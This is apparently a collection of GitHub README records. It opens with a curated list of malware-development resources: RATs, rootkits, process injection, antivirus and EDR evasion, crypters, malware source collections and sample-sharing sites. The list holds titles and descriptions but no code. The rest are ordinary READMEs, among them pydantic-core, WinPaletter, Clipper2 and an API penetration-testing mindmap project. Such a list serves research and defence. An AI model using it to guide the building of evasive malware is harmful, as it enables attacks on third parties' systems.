\ Master of RATs - How to create your own Tracker \ Amazing article to read with some good resources (Personal Tale and the Road to Malware Development, Resources) \ PT_NOTE -> PT_LOAD x64 ELF virus written in Assembly \ The magic of LD_PRELOAD for Userland Rootkits(good read if you wanna get into rootkits this blog is for userland rootkits) \ (Recommended Read) if you want to creat your first userland rootkit and you just know C you can go for this blog if you wanna start into rootkit development \ Function Hooking Part I: Hooking Shared Library Function Calls in Linux \ Inline Hooking for Programmers (Part 1: Introduction) \ Inline Hooking for Programmers (Part 2: Writing a Hooking Engine) \ PE injection for beginners \ Becoming-rat-your-system \ Complete guide on LKM hacking \ Best series i will say if you wanna get into programming/malware dev recommended series to follow it will start with learn programming thats needed asm and stuff after that getting into maldev \ Filess malware \ Examining the Morris Worm Source Code \ IOT Malware \ DoublePulsar SMB backdoor analysis \ Eset Turla Outlook backdoor report \ Writing a custom encoder \ Engineering antivirus evasion \ Analysis of Project Sauron APT \ WastedLocker analysis \ Lazarus shellcode execution \ Detailed analysis of Zloader \ BendyBear shellcode malware \ A Basic Windows DKOM Rootkit \ Loading Kernel Shellcode \ Windows Kernel Shellcode on Windows 10 – Part 1 \ Windows Kernel Shellcode on Windows 10 – Part 2 \ Windows Kernel Shellcode on Windows 10 – Part 3 \ Introduction to Shellcode Development \ Autochk Rootkit Analysis \ pierogi backdoor \ Pay2Kitten \ STEELCORGI \ Lebanese Cedar APT \ LazyScripter \ Maze deobfuscation \ Darkside overview \ SunBurst backdoor - FireEye analysis \ Code obfuscation techniques \ SideCopy APT tooling \ Hiding in PEB sight: Custom loader \ Zloader: New infection technique \ FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines \ A tale of EDR bypass methods \ In-depth dive into the security features of the Intel/Windows platform secure boot process \ Process Injection Techniques \ Adventures with KernelCallbackTable Injection \ Useful Libraries for Malware Development \ Parent Process ID (PPID) Spoofing \ Mutants Sessions Self Deletion \ OffensiVe Security with V - Process Hollowing \ Looking for Remote Code Execution bugs in the Linux kernel \ memory-analysis-evasion \ 100% evasion - Write a crypter in any language to bypass AV Forums https://0x00sec.org/ One of the best Malware Development fourms that helped me a lot. Sample Sharing Underground MalShare Malware Bazaar Some interesting Github Repos(miscellaneous) TL-TROJAN A collection of source code for various RATs, Stealers, and other Trojans. Linker_preloading_virus An example of hijacking the dynamic linker with a custom interpreter who loads and executes modular viruses. Awesome-linux-rootkits A summary of linux rootkits published on GitHub. Virii Collection of ancient computer virus source codes. Flare-floss FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware. Ebpfkit Ebpfkit is a rootkit powered by eBPF. Al-Khaser Public malware techniques used in the wild: Virtual Machine, Emulation, Debuggers, Sandbox detection. Evasions Evasions encyclopedia gathers methods used by malware to evade detection when run in virtualized environment. loonix_syscall_hook System call hooking on arm64 linux via a variety of methods. 
awesome-executable-packing A curated list of awesome resources related to executable packing.;Organized list of my malware development resources;malware,malware-development,malware-research
rootkit-io/awesome-malware-development
pydantic/pydantic-core;pydantic-core

This package provides the core functionality for pydantic validation and serialization.

Pydantic-core is currently around 17x faster than pydantic V1. See tests/benchmarks/ for details.

Example of direct usage

NOTE: You should not need to use pydantic-core directly; instead, use pydantic, which in turn uses pydantic-core.

```py
from pydantic_core import SchemaValidator, ValidationError

v = SchemaValidator(
    {
        'type': 'typed-dict',
        'fields': {
            'name': {
                'type': 'typed-dict-field',
                'schema': {
                    'type': 'str',
                },
            },
            'age': {
                'type': 'typed-dict-field',
                'schema': {
                    'type': 'int',
                    'ge': 18,
                },
            },
            'is_developer': {
                'type': 'typed-dict-field',
                'schema': {
                    'type': 'default',
                    'schema': {'type': 'bool'},
                    'default': True,
                },
            },
        },
    }
)

r1 = v.validate_python({'name': 'Samuel', 'age': 35})
assert r1 == {'name': 'Samuel', 'age': 35, 'is_developer': True}

# pydantic-core can also validate JSON directly
r2 = v.validate_json('{"name": "Samuel", "age": 35}')
assert r1 == r2

try:
    v.validate_python({'name': 'Samuel', 'age': 11})
except ValidationError as e:
    print(e)
    """
    1 validation error for model
    age
      Input should be greater than or equal to 18
      [type=greater_than_equal, context={ge: 18}, input_value=11, input_type=int]
    """
```

Getting Started

You'll need rust stable installed, or rust nightly if you want to generate accurate coverage.

With rust and python 3.8+ installed, compiling pydantic-core should be possible with roughly the following:

```bash
# clone this repo or your fork
git clone git@github.com:pydantic/pydantic-core.git
cd pydantic-core
# create a new virtual env
python3 -m venv env
source env/bin/activate
# install dependencies and install pydantic-core
make install
```

That should be it, the example shown above should now run.

You might find it useful to look at python/pydantic_core/_pydantic_core.pyi and python/pydantic_core/core_schema.py for more information on the python API; beyond that, tests/ provide a large number of examples of usage.

If you want to contribute to pydantic-core, you'll want to use some other make commands:
- make build-dev to build the package during development
- make build-prod to perform an optimised build for benchmarking
- make test to run the tests
- make testcov to run the tests and generate a coverage report
- make lint to run the linter
- make format to format python and rust code
- make to run format build-dev lint test

Profiling

It's possible to profile the code using the flamegraph utility from flamegraph-rs. (Tested on Linux.) You can install this with cargo install flamegraph.

Run make build-profiling to install a release build with debugging symbols included (needed for profiling).

Once that is built, you can profile pytest benchmarks with (e.g.):

```bash
flamegraph -- pytest tests/benchmarks/test_micro_benchmarks.py -k test_list_of_ints_core_py --benchmark-enable
```

The flamegraph command will produce an interactive SVG at flamegraph.svg.

Releasing

1. Bump the package version locally. Do not just edit Cargo.toml on Github; you need both Cargo.toml and Cargo.lock to be updated.
2. Make a PR for the version bump and merge it.
3. Go to https://github.com/pydantic/pydantic-core/releases and click "Draft a new release".
4. In the "Choose a tag" dropdown enter the new tag v<the.new.version> and select "Create new tag on publish" when the option appears.
5. Enter the release title in the form "v<the.new.version>".
6. Click the "Generate release notes" button.
7. Click "Publish release".
8. Go to https://github.com/pydantic/pydantic-core/actions and ensure that all builds for the release finish successfully.
9. Go to https://pypi.org/project/pydantic-core/ and ensure that the latest release is published.
10. Done 🎉;Core validation logic for pydantic written in rust;json-schema,parsing,pydantic,rust,schema,validation
pydantic/pydantic-core
Abdelrhman-AK/WinPaletter;🛑 Announcement: Project Development Discontinuation:

Dear WinPaletter Users,

It is with a heavy heart that I announce the discontinuation of further development on the WinPaletter project. While there's an extremely slim possibility that I may find time in the distant future, perhaps years from now, to resume maintenance, I must inform you that version 1.0.9.3 marks the end of active development. Subsequent versions (1.0.9.x) are extremely unlikely to be developed.

In the coming days or weeks, I will proceed to archive this repository. However, please note that the existing version will remain accessible for continued use, albeit without updates or maintenance.

You can certainly contribute to the WinPaletter Store for themes; this repository won't be archived. Open the Wiki and navigate to the WinPaletter Store section in the side panel.

I want to express my deepest gratitude for your support and for choosing WinPaletter. Your enthusiasm and feedback have been invaluable throughout this journey. It has been an immense honor for me to contribute to a project that aimed to enhance your user experience.

If WinPaletter has caused any inconvenience or disruption to your Windows setup, I sincerely apologize.

WinPaletter

WinPaletter is a portable tool designed to elevate your Windows desktop experience. Whether you're a designer, developer, or someone who loves personalization, WinPaletter offers an intuitive interface and robust features to streamline the management and application of colors and effects on your Windows system. With WinPaletter, you can customize a wide range of Windows aspects, including Windows Colors, Visual Styles, Classic Colors, Lock screen (LogonUI), Cursors, Metrics and Fonts, Terminals and Consoles, wallpaper, sounds, screen savers, Windows effects (tweaks), and Windows icons according to your preferences.

Key Features

- Intuitive Interface: WinPaletter boasts a user-friendly interface, making color palette management accessible to users of all levels of expertise.
- Themes Import/Export: Explore a world of creativity with the ability to import and export themes. Visit the WinPaletter Store to discover a diverse collection of themes shared by the community.
- Real-time Preview: Witness your color choices come to life with the real-time preview feature, allowing you to fine-tune your color scheme effortlessly.

Getting Started

Requirements:

| Windows | WinPaletter ... and higher | Frameworks |
| ------------------ | ------------------------------------------------ | ---------- |
| 11, 10 | Any version | You might need to update the .NET framework on outdated Windows 10 or builds older than 1709 |
| 8.1, 7 | 1.0.5.0 | .NET Framework 4.7.2, or 4.8 |
| 8 | Not supported :x: | Not supported, as .NET framework 4.7.2 or 4.8 can't be installed at all |
| Vista | 1.0.7.1 | .NET Framework 4.8 Repacked. Read Windows Vista's documentation |
| XP | 1.0.7.1 | OneCoreAPI + .NET Framework 4.8 Repacked. You must read its documentation |

Download:

You can download the latest release from the releases page.

> Note: It is the first source to be updated.

Alternatively, you can use:

- Microsoft WinGet: winget install Abdelrhman-AK.WinPaletter -l "UnzipPath"
- Chocolatey: choco install WinPaletter or choco install WinPaletter --version x.x.xx

Visit this for advanced instructions.
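For example, a concrete WinGet invocation could look like the following. The unzip path here is purely illustrative; since WinPaletter is portable, the -l location is simply the folder the package gets extracted to, and you can run the executable from there directly:

```bash
winget install Abdelrhman-AK.WinPaletter -l "C:\Tools\WinPaletter"
```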
Launch: Once downloaded, launch WinPaletter and start exploring its features to enhance your desktop aesthetics. Wiki (Help) Click here to learn more about WinPaletter. Changelog Click here to view all changes that have been made to WinPaletter since its initial release. Support me PayPal Languages Click here to get languages for WinPaletter. Do you have an antivirus or browser issue? Click here to read instructions . Credits WinPaletter is developed and maintained by Abdelrhman-AK and the incredible open-source community: Modifying Modern Windows Elements Inspired by u/aveyo and u/Egg-Tricky on Reddit: Link 1 , Link 2 Patching UxTheme.dll to apply unsigned Visual Styles by SecureUxTheme, developed by namazso 3D and flat degrees modification in 3D objects (Classic Colors) is inspired by Desktop Architect Colors picking controls by Cyotek Image to palette conversion mechanism by ColorThief, developed by KSemenenko Bitmap effects powered by ImageProcessor Bitmaps to cursors conversion mechanism developed by Evan Olds Retrieving elements of Windows XP visual styles (*.msstyles) using the Advanced UxTheme wrapper Extracting elements from visual styles (*.msstyles) using nptr/msstyleEditor Patching PE files by Ressy, developed by Tyrrrz Handling JSON files using Newtonsoft JSON by James Newton-King Processing and handling command lines arguments by CommandLineParser Icons designed by Pichon Animation and transition effects for controls by FluentTransitions, developed by Andreas Wäscher Animation for Controls by Pavel Torgashov Modern dialogs design (messages boxes) by Ookii.Dialogs.WinForms Using JetBrainsMono as a monospaced font for WinPaletter These items are provided by Microsoft: Classic color schemes, Luna theme preview (Luna.msstyles) and Command Prompt and PowerShell raster fonts previews License WinPaletter is licensed under the MIT/LGPL Dual License . Feel free to use, modify, and distribute it in accordance with the terms of the license.;Advanced Windows Appearance Editor;windows10,windows11,theme,windows7,windows8-1,cursors,logonui,windows-classic,command-prompt,powershell
Abdelrhman-AK/WinPaletter
Dr-TSNG/TwiFucker;TwiFucker ### Yet Another Adkiller for Twitter [![author][author-image]][author-url] [![release][release-image]][release-url] [![last commit][last-commit-image]][last-commit-url] English   |   [Indonesia](README_IN.md)   |   [日本語](README_JA.md) ## ⚠️ This is an Xposed module. Support only API 93+ ⚠️ You can find Beta version / Rootless integration (automatically embed latest Twitter with [LSPatch](https://github.com/LSPosed/LSPatch)) at our Telegram channel [author-image]: https://img.shields.io/badge/author-Nullptr-blue.svg [author-url]: https://github.com/Dr-TSNG [release-image]: https://img.shields.io/github/v/release/Dr-TSNG/TwiFucker?color=blue [release-url]: https://github.com/Dr-TSNG/TwiFucker/releases/latest [last-commit-image]: https://img.shields.io/github/last-commit/Dr-TSNG/TwiFucker?label=last%20commit [last-commit-url]: https://github.com/Dr-TSNG/TwiFucker/commits 🚫 This project is currently discontinued due to shameless plagiarism ⚠️ Copyright Notice What we hate most about is the modification of our texts, especially our MODULE TITLE , which absolutely means they want others to think all the work is done by THEM instead of others, though they actually helped NOTHING with the module development. We are not opposed to integrating our module in your client, but we strongly condemn the behavior of modifying our texts and hiding our author info . Although our project was open source before, we didn't set up a license, so ALL COPYRIGHTS RESERVED . And from now on we decline ANY modification or pre-patched client. It's ok if you LSPatch Twitter with our module by yourself, but you should not release your patched apk anywhere. ✨ Features ## Remove promoted content ## Remove promoted users ## Remove promoted trends ## Remove sensitive media warning ## Disable recommended users ## Copyable alt text ## Download media menu ## Hide drawer items Slightly broken due to Twitter new drawer layout. ## Hide navigation bar items ## Disable url redirect Prevent Twitter redirect from `t.co` to target link when clicking on a link in Twitter. ## Disable Threads (live content) ## Disable Tweet Detail Related Tweets ## Remove video carousel ## Feature switch Force enable/disable Twitter experimental feature. ## Disable banner view 🛠️ Usage Long tap Twitter logo at top of the Twitter home screen OR Settings and privacy > Additional resources > Tap version 🚀 Stargazers over time;Yet Another Adkiller for Twitter;android,twitter,xposed
Dr-TSNG/TwiFucker
AngusJohnson/Clipper2;Clipper2

A Polygon Clipping and Offsetting library (in C++, C# & Delphi)

The Clipper2 library performs intersection, union, difference and XOR boolean operations on both simple and complex polygons. It also performs polygon offsetting. This is a major update of my original Clipper library that was written over 10 years ago. That library I'm now calling Clipper1, and while it still works very well, Clipper2 is better in just about every way.

Compilers

Clipper2 can be compiled using either C++, or C#, or Delphi Pascal. The library can also be accessed from other programming languages by dynamically linking to exported functions in the C++ compiled Clipper2 library. (Since the C++ compiled code is measurably faster, C# and Delphi developers may also prefer this approach in applications where the library's performance is critical.)

| Lang. | Requirements |
| --- | --- |
| C++: | Requires C++17 (could be modified to C++11 with relatively minor changes), or |
| C#: | The library uses Standard Library 2.0 but the sample code uses .NET6, or |
| Delphi: | Compiles with any version of Delphi from version 7 to current. |

Documentation

Extensive HTML documentation

Examples

```cpp
//C++
Paths64 subject, clip, solution;
subject.push_back(MakePath({100, 50, 10, 79, 65, 2, 65, 98, 10, 21}));
clip.push_back(MakePath({98, 63, 4, 68, 77, 8, 52, 100, 19, 12}));
solution = Intersect(subject, clip, FillRule::NonZero);
```

```csharp
//C#
Paths64 subj = new Paths64();
Paths64 clip = new Paths64();
subj.Add(Clipper.MakePath(new int[] { 100, 50, 10, 79, 65, 2, 65, 98, 10, 21 }));
clip.Add(Clipper.MakePath(new int[] { 98, 63, 4, 68, 77, 8, 52, 100, 19, 12 }));
Paths64 solution = Clipper.Intersect(subj, clip, FillRule.NonZero);
```

```pascal
//Delphi
var
  subject, clip, solution: TPaths64;
begin
  SetLength(subject, 1);
  subject[0] := MakePath([100, 50, 10, 79, 65, 2, 65, 98, 10, 21]);
  SetLength(clip, 1);
  clip[0] := MakePath([98, 63, 4, 68, 77, 8, 52, 100, 19, 12]);
  solution := Intersect(subject, clip, frNonZero);
```

Ports to other languages

| lang. | link |
| ------ | ------ |
| WASM | https://github.com/ErikSom/Clipper2-WASM/ |
| Java | https://github.com/micycle1/Clipper2-java/ |
| Kotlin | https://github.com/Monkey-Maestro/clipper2-kotlin |
| golang | https://github.com/epit3d/goclipper2 |;Polygon Clipping and Offsetting - C++, C# and Delphi;cpp,csharp,delphi,geometry,pascal,polygon-intersection,polygon-union,offsetting,polygon,polygon-boolean
AngusJohnson/Clipper2
deltazefiro/Amarok-Hider;Amarok-Hider 🌐 ENGLISH | 简体中文 What is Amarok? Amarok is an Android application which enables you to hide your private files & apps with a single click. Often, we resort to complex encryptors to secure our files and apps, aiming to shield them from prying eyes. These encryptors, while effective, tend to be slow and resource-intensive, making the encryption of large files such as videos and music a daunting task. Despite their robust security, these methods are often overkill for the average user who simply wish to keep their private files and apps out of unintentional reach. Amarok is designed to be a light-weight hider for files and applications: - It disguises file names and headers, causing them to seem "corrupted" and unopenable. - Amarok deactivates applications, rendering them invisible in the launcher and system menu. Features User-Friendly : Easily hide files and applications with a single click. Rapid and Efficient Large File Hiding : Hides by altering only file name and signature, unaffected by file size. Root-Free Application Hiding : Makes apps vanish from the launcher. Compatible with Root, Shizuku, Dhizuku, and DSM modes. Panic button : Use a floating button to quickly hide applications and files in urgent scenarios. Quick Settings Tile : A control center toggle for immediate hiding, bypassing the need to launch the app. App Lock : Secure Amarok access with a password or fingerprint. Pleasant Interface : Clean and attractive Material3 design. [!IMPORTANT] Please aware that Amarok is not an encryption software, but rather a tool for hiding things. We strongly advise against using Amarok to protect confidential files and applications. Screenshots Download (FOSS) (FOSS) (Pre-release channel) Usage Contributing Thank you for dedicating your time in contributing to this project! Contributions in all forms are welcomed, including reporting bugs, proposing new features, performing language translations, and submitting code development PRs. We use weblate for translations. Credits Many thanks to: aistra0528/Hail , for providing code reference for the app hider. Icongeek26 & Freepik , for the icons Jetbrains , provides IDE support for open source projects RikkaApps/Shizuku iamr0s/Dhizuku kizitonwose/Calendar ... and all the dedicated contributors ! Disclaimers Amarok is provided without any warranties or conditions. The user is fully responsible for any harm or consequences that may arise from using Amarok.;Hide your private files and apps with a single click.;android,android-application,privacy-protection,hider,file-hider
deltazefiro/Amarok-Hider
greenpau/caddy-security;windows/amd64 linux/amd64 caddy-security Security App and Plugin for Caddy v2 . It includes: Authentication Plugin for implementing Form-Based, Basic, Local, LDAP, OpenID Connect, OAuth 2.0, SAML Authentication Authorization Plugin for HTTP request authorization based on JWT/PASETO tokens Credentials Plugin for managing credentials for various integrations Please show your appreciation for this work and :star: :star: :star: Please consider sponsoring this project via Github Sponsors! Please ask questions either here or via LinkedIn. I am happy to help you! @greenpau Documentation : docs.authcrunch.com Docker Container : authcrunch/authcrunch Configuration Examples : here Security Policy : SECURITY.md;🔐 Authentication, Authorization, and Accounting (AAA) App and Plugin for Caddy v2. 💎 Implements Form-Based, Basic, Local, LDAP, OpenID Connect, OAuth 2.0 (Github, Google, Facebook, Okta, etc.), SAML Authentication. MFA/2FA with App Authenticators and Yubico. 💎 Authorization with JWT/PASETO tokens. 🔐;caddy-plugin,caddy2,security,jwt,authorization,authentication,auth,paseto,paseto-tokens,saml
greenpau/caddy-security
Cyber-Guy1/API-SecurityEmpire;🛡️ API Security Empire Project Credits: Momen Eldawakhly (Cyber Guy) In this repository you will find: Mindmaps, tips & tricks, resources and every thing related to API Security and API Penetration Testing. Our mindmaps and resources are based on OWASP TOP 10 API, our expereince in Penetration testing and other resources to deliver the most advanced and accurate API security and penetration testing resource in the WEB!! 🚪 First gate: {{Recon}} The first gate to enter the API Security Empire is to know how to gather information about the API infrastructure and how to perform a powerfull recon on API to extract the hidden doors which made you compromise the whole infrastructure from, so, we provide this updated API Recon mindmap with the latest tools and methodologies in API recon: PDF Version | XMind Version ⚔️ Weapons you will need: BurpSuite FFUF Arjun Postman SecLists FuzzDB SoapUI GraphQL Voyager Graphinder Kiterunner unfurl 🏋️ Test your abilities and weapons: vapi Generic-University 🚪 Second gate: {{Attacking}} Attacking RESTful & SOAP: PDF Version | XMind Version Attacking GraphQL: Due to the limited attacks in the GraphQL we tried to generate all the possible attacks due to our experience in testing APIs in the coming mindmap: PDF Version | XMind Version While attacking GraphQL, the most important phase is the enumeration of mutations and queries, without which you will not be able to perform full GraphQL testing, to do so, I'm using the Apollo GraphQL Sandbox , Apollo enumerates the queries and mutations, then sorting them in front of you, after that you can chose the action you want to perform using mutations or the data you want to retrive using queries by just chosing them via GUI and Apollo will write down the query automatically. What makes Apollo special is that it's a web based explorer, which means no need to install and you can run it against your local GraphQl too!! Apollo Sandbox 🙏 Special thanks: roottusk Portswigger Tomnomnom assetnote danielmiessler InsiderPhD ffuf OWASP 📝 License:;API Security Project aims to present unique attack & defense methods in API Security field;cybersecurity,penetration-testing,apisecurity,information-security,bugbounty,api,bug-bounty,infosec,cybersec,tips
Cyber-Guy1/API-SecurityEmpire
rust-cross/cargo-zigbuild;cargo-zigbuild 🚀 Help me to become a full-time open-source developer by sponsoring me on GitHub Compile Cargo project with zig as linker for easier cross compiling . Installation bash cargo install cargo-zigbuild You can also install it using pip which will also install ziglang automatically: bash pip install cargo-zigbuild We also provide a Docker image which has macOS SDK pre-installed in addition to cargo-zigbuild and Rust, for example to build for x86_64 macOS: bash docker run --rm -it -v $(pwd):/io -w /io messense/cargo-zigbuild \ cargo zigbuild --release --target x86_64-apple-darwin Usage Install zig following the official documentation , on macOS, Windows and Linux you can also install zig from PyPI via pip3 install ziglang Install Rust target via rustup, for example, rustup target add aarch64-unknown-linux-gnu Run cargo zigbuild , for example, cargo zigbuild --target aarch64-unknown-linux-gnu Specify glibc version cargo zigbuild supports passing glibc version in --target option, for example, to compile for glibc 2.17 with the aarch64-unknown-linux-gnu target: bash cargo zigbuild --target aarch64-unknown-linux-gnu.2.17 [!NOTE] There are various caveats with the glibc version targeting feature: - If you do not provide a --target , Zig is not used and the command effectively runs a regular cargo build . - If you specify an invalid glibc version, cargo zigbuild will not relay the warning emitted from zig cc about the fallback version selected. - This feature does not necessarily match the behaviour of dynamically linking to a specific version of glibc on the build host. - Version 2.32 can be specified, but runs on a host with only 2.31 available when it should instead abort with an error. - Meanwhile specifying 2.33 will correctly be detected as incompatible when run on a host with glibc 2.31. - Certain RUSTFLAGS like -C linker opt-out of using Zig, while -L path/to/files will have Zig ignore -C target-feature=+crt-static . - -C target-feature=+crt-static for statically linking to a glibc version is not supported ( upstream zig cc lacks support ) macOS universal2 target cargo zigbuild supports a special universal2-apple-darwin target for building macOS universal2 binaries/libraries on Rust 1.64.0 and later. bash rustup target add x86_64-apple-darwin rustup target add aarch64-apple-darwin cargo zigbuild --target universal2-apple-darwin Note Note that Cargo --message-format option doesn't work with universal2 target currently. Caveats Currently only Linux, macOS and Windows gnu targets are supported, other target platforms can be added if you can make it work, pull requests are welcome. Only current Rust stable and nightly versions are regularly tested on CI, other versions may not work. Known upstream zig issues : zig cc: parse -target and -mcpu / -march / -mtune flags according to clang : Some Rust targets aren't recognized by zig cc , for example armv7-unknown-linux-gnueabihf , workaround by using -mcpu=generic and explicitly passing target features in #58 ability to link against darwin frameworks (such as CoreFoundation) when cross compiling : Set the SDKROOT environment variable to a macOS SDK path to workaround it zig misses some compiler_rt functions that may lead to undefined symbol error for certain targets. See also: zig compiler-rt status . CPU features are not passed to clang License This work is released under the MIT license. 
A copy of the license is provided in the LICENSE file.;Compile Cargo project with zig as linker;cargo-subcommand,zig,cross-compile
rust-cross/cargo-zigbuild
reactplay/react-play;ReactPlay(Repo: react-play ) Learn . Create . Share about your ReactJS Development Journey View Demo · Report Bug · Request Feature 👋 Introducing ReactPlay react-play is an open-source web app that helps you learn ReactJS faster with a hands-on practice model. It is a collection of ReactJS projects that you can use to learn ReactJS. Is that all? Nope. You can also create your projects and share them with the world. The best part is that the ReactJS experts will review your project code before it gets part of the ReactPlay app. Isn't that a pure WIN-WIN? 🔥 Demo Here is the link to the app. We hope you enjoy it. The ReactPlay app Link Who doesn't want motivation and support? Many Thanks to all the Stargazers who have supported this project with stars(⭐). You all are amazing!!! Please support the work by giving the repository a ⭐, contributing to it, and/or sponsoring using the Sponsor button at the top 😍. You can also follow us on Twitter @reactplayio . 🏗️ How to Set up ReactPlay for Development? You may want to set up the react-play repo for the following reasons: You want to create a new play (A play is a React project) or want to edit an existing play as a contributor. Please check the Create a Play Guide for more details. Also, please check the Contribution Guide to get started. You want to contribute to the react-play repo in general. Please check the Contribution Guide to get started. Here is a quick overview of the react-play repo setup: 🍴 Fork and Clone the Repo First, you need to fork the react-play repo. You can do this by clicking the Fork button on the top right corner of the repo. If you are new to forking, please watch this YouTube Guide to get started. Once forked, you can clone the repo by clicking the Clone or Download button on the top right corner of the forked repo. Please change the directory after cloning the repository using the cd <folder-name> command. Note: Please do not remove the .env.development file from the root folder. It contains all the environment variables required for development. ⬇️ Install Dependencies Next, install the dependencies by running the following command in the react-play repo. we recommend using yarn but you can install using npm too bash yarn install Or npm install if you don't have yarn installed on your PC, follow the steps below to install it.. Windows 1. open your command prompt as administrator. 2. write corepack enable and hit enter. 3. then npm install --global yarn Linux 1. open terminal and hit npm install --global yarn MacOS 1. open terminal and hit npm install --global yarn or brew install yarn Or Download Package If you are unable to install yarn following the above-mentioned process, then you can simply download the package and install it. Visit the official website of Yarn; there you can just expand the "Alternative" section and it will ask for the version to download for Windows, Linux, or Mac. https://classic.yarnpkg.com/en/docs/install#windows-stable Note : ReactPlay runs on React 18. However, some of our dependencies are yet to upgrade to version 18. So please use the following command when you face difficulties installing the dependencies. Also, ensure to use Node.js version >= 16.x npm install --legacy-peer-deps 🦄 Start the Development Mode Use the following command to start the app in the development mode: bash yarn start or if you installed dependencies using npm use below command npm start Note : The start script automatically invokes "linters" process. 
Should you need to run the app without lint the use start:nolint instead. However make sure that you run start script at least once before committing your code. Code with linter error may not be reviewed. It runs the app in development mode. Open http://localhost:3000 to view it in your browser. The page will reload when you make changes. You may also see any lint errors in the console. ✨ Format and lint the code Use the following command to format and lint the code: Format the code bash yarn run format OR npm run format Lint the code to check the linting issue bash yarn run lint OR npm run lint to fix the linting issue bash yarn run lint:fix OR npm run lint:fix 🧱 Build the App for Production Use the following command to build the app for production: bash yarn build OR npm build It builds the app for production to the build folder. It correctly bundles React in production mode and optimizes the build for the best performance. The build is minified and the filenames include the hashes. 🧪 Test App Locally (E2E with Playwright) Use the following command to install browser(s) binaries to test locally: bash yarn install playwright OR npm install playwright Use the following command to run Playwright tests: bash yarn e2e OR npm run e2e 👀 Read more about testing in react-play 👀 Read more about playwright: https://playwright.dev/ 🚀 Deploy You can deploy the app to Vercel or Netlify with a single click. 🤝 Contributing to ReactPlay Any kind of positive contribution is welcome! Please help us to grow by contributing to the project. If you wish to contribute, you can, Create a Play Suggest a Feature Test the app, and help it improve. Improve the app, fix bugs, etc. Improve documentation. Create content about ReactPlay and share it with the world. Please read CONTRIBUTING for details on our CODE OF CONDUCT , and the process for submitting pull requests to us. 🆕 New to Open Source? 💡 Follow this guide to jumpstart your Open Source journey 🚀. Launching reactplay Rewards Contributed to reactplay? Here is a big thank you from our community to you. Claim your badge and showcase them with pride. Let us inspire more folks ! Claim Now! 🙏 Support We all need support and motivation. ReactPlay is not an exception. Please give this project a ⭐️ to encourage and show that you liked it. Don't forget to leave a star ⭐️ before you move away. If you found the app helpful, consider supporting us with a coffee. A ⭐️ to ReactPlay is to make us more 💪 stronger and motivated. Contributors ✨ Thanks goes to these wonderful people ( emoji key ): Tapas Adhikary 💻 Nirmal Kumar 💻 Murtuzaali Surti 💻 Abhishek Khatri 💻 Abhishek Holani 💻 Hasnain Makada 💻 Shrilakshmi Shastry 💻 Mohammed Taha 💻 Dalpat Rathore 💻 Eray Alkış 💻 Nirban Chakraborty 💻 Deepak Pundir 💻 Vasanti Suthar 📖 Ahnaf Ahamed 💻 Shivam Katare 💻 Shyam Mahanta 💻 Koustov 💻 Shri Om Trivedi 💻 Naresh Naik 💻 Vincent Patoc 💻 Sachin Chaurasiya 💻 Tejinder Sharma 💻 Ishrar G 💻 Programming-School 💻 Valesh Gopal 💻 Emdadul Haque 💻 Olang Daniel 💻 Supriya M 💻 Saksham chandel 💻 Luca Pizzini 💻 Shivam Bhasin 💻 Tejas Shekar 💻 Anirban Pratihar 💻 Harsh Singh 💻 Franklin U.O. 
Ohaegbulam 💻 Ammaar Aslam 💻 Mayukh Bhowmick 💻 Emmanuel O Eboh 💻 Shailesh Parmar 💻 dangvu0502 💻 Ceesco 🎨 Hamza Ali 🎨 yash91989201 💻 Makdoom Shaikh 💻 Muzaffar Hossain 💻 Susmita Dey 💻 Sanjay Kumar 💻 Vinay Patil 💻 Abhilash 💻 Kashish Lakhara 💻 hiimnhan 💻 Siddharth Khatri 💻 Emma Dawson 💻 Senali 💻 Nisha Sen 💻 Harshil Jani 💻 Oluka Isaac 💻 NagarjunShroff 💻 Aakash Vishwakarma 💻 Ankit Kumar 💻 Keerthivasan D 💻 Bhavika Tibrewal 💻 Abhi Patel 💻 Aimun Nahar 💻 GodStarLord 💻 Joe Shajan 💻 MohZaid Kapadia 💻 Sam 💻 Trishna Kalita 💻 Wyarej Ali 💻 Zülal Nebin 💻 nrshnaik 💻 Jannik Schmidtke 💻 Md. Saddam Hossain 💻 Janvi Bajoria 💻 Chhakuli Zingare 💻 clevercoderjoy 💻 Priyankar Pal 💻 Akshay Gore 💻 This project follows the all-contributors specification. Contributions of any kind are welcome!;react-play is an opensource platform that helps you learn ReactJS faster with hands-on practice model. It is a collection of projects that you can use to learn ReactJS.;react,reactjs,javascript,react-hooks,open-source,opensource,hacktoberfest
reactplay/react-play
kraanzu/smassh;Smassh 🖮

Smassh is a TUI based typing test application inspired by MonkeyType -- a very popular online web-based typing application. Smassh tries to be a full-fledged typing test experience, while not missing out on looks and feel!

> [!CAUTION]
> Smassh, by default, uses nerd fonts for the icons.
> If not installed, you'll see random gibberish icons.

Installation 🔨

Using Pip 🐍

You can install the stable version of smassh by using pip or pipx:

```bash
pip install smassh
```

Using AUR 📦

```bash
yay -S smassh-bin
```

Executable binary 🔌

You should be able to see binaries for Linux, macOS and Windows in the releases section.

> [!NOTE]
> This should automatically create an executable smassh that can be run directly from the command line.
> If not, check if the local path is added to $PATH.

Features 🌟

Some features that smassh comes with:

- An interactive & beautiful UI
- Words and Time modes for typing
- Real-time comparison of speed carets
- Change styles/settings on the fly
- Multiple theme support
- Multiple language support
- Lots of options to tweak!

Tweaks ⚙️

| Tweak | Description |
| --------------- | :--------------------------------------------------------------------------- |
| Blind mode | You wouldn't be able to see your mistakes |
| Capital Letters | Some letters in your tasks will be capitalized! |
| Caret Style | Caret style matters! |
| Confidence mode | Are you sure you don't need backspace? Try this :) |
| Cursor Buddy | Setup your cursor buddy to run along with you! |
| Difficulty | Choose how strict smassh should be with your wrong keypresses |
| Force Correct | You wouldn't be able to go on without cleaning your pool of mistakes |
| Min Accuracy | Fall below this average accuracy and you fail! |
| Min Burst | Fall below this average accuracy for even a word and you fail! |
| Min Speed | Fall below this average speed and you fail! |
| Tab Reset | Hey hey! You wanna reset already? I got ya! |

Screenshots 🖼️

Contribution 🤝

See CONTRIBUTING.md for contributions.

Credits 🙏

Many thanks to:
- @frizd for the awesome banner
- @miodec for monkeytype!

Other TUI projects 🤓:

If you liked smassh then you might wanna try out some of my other TUI projects as well:

- dooit - A todo app that you didn't ask for but needed!
- gupshup - A localhost TUI chat client;Smassh your Keyboard, TUI Edition;python3,tui,textual,rich,typing,typingspeedtest,typingspeed,terminal-based,monkeytype
kraanzu/smassh
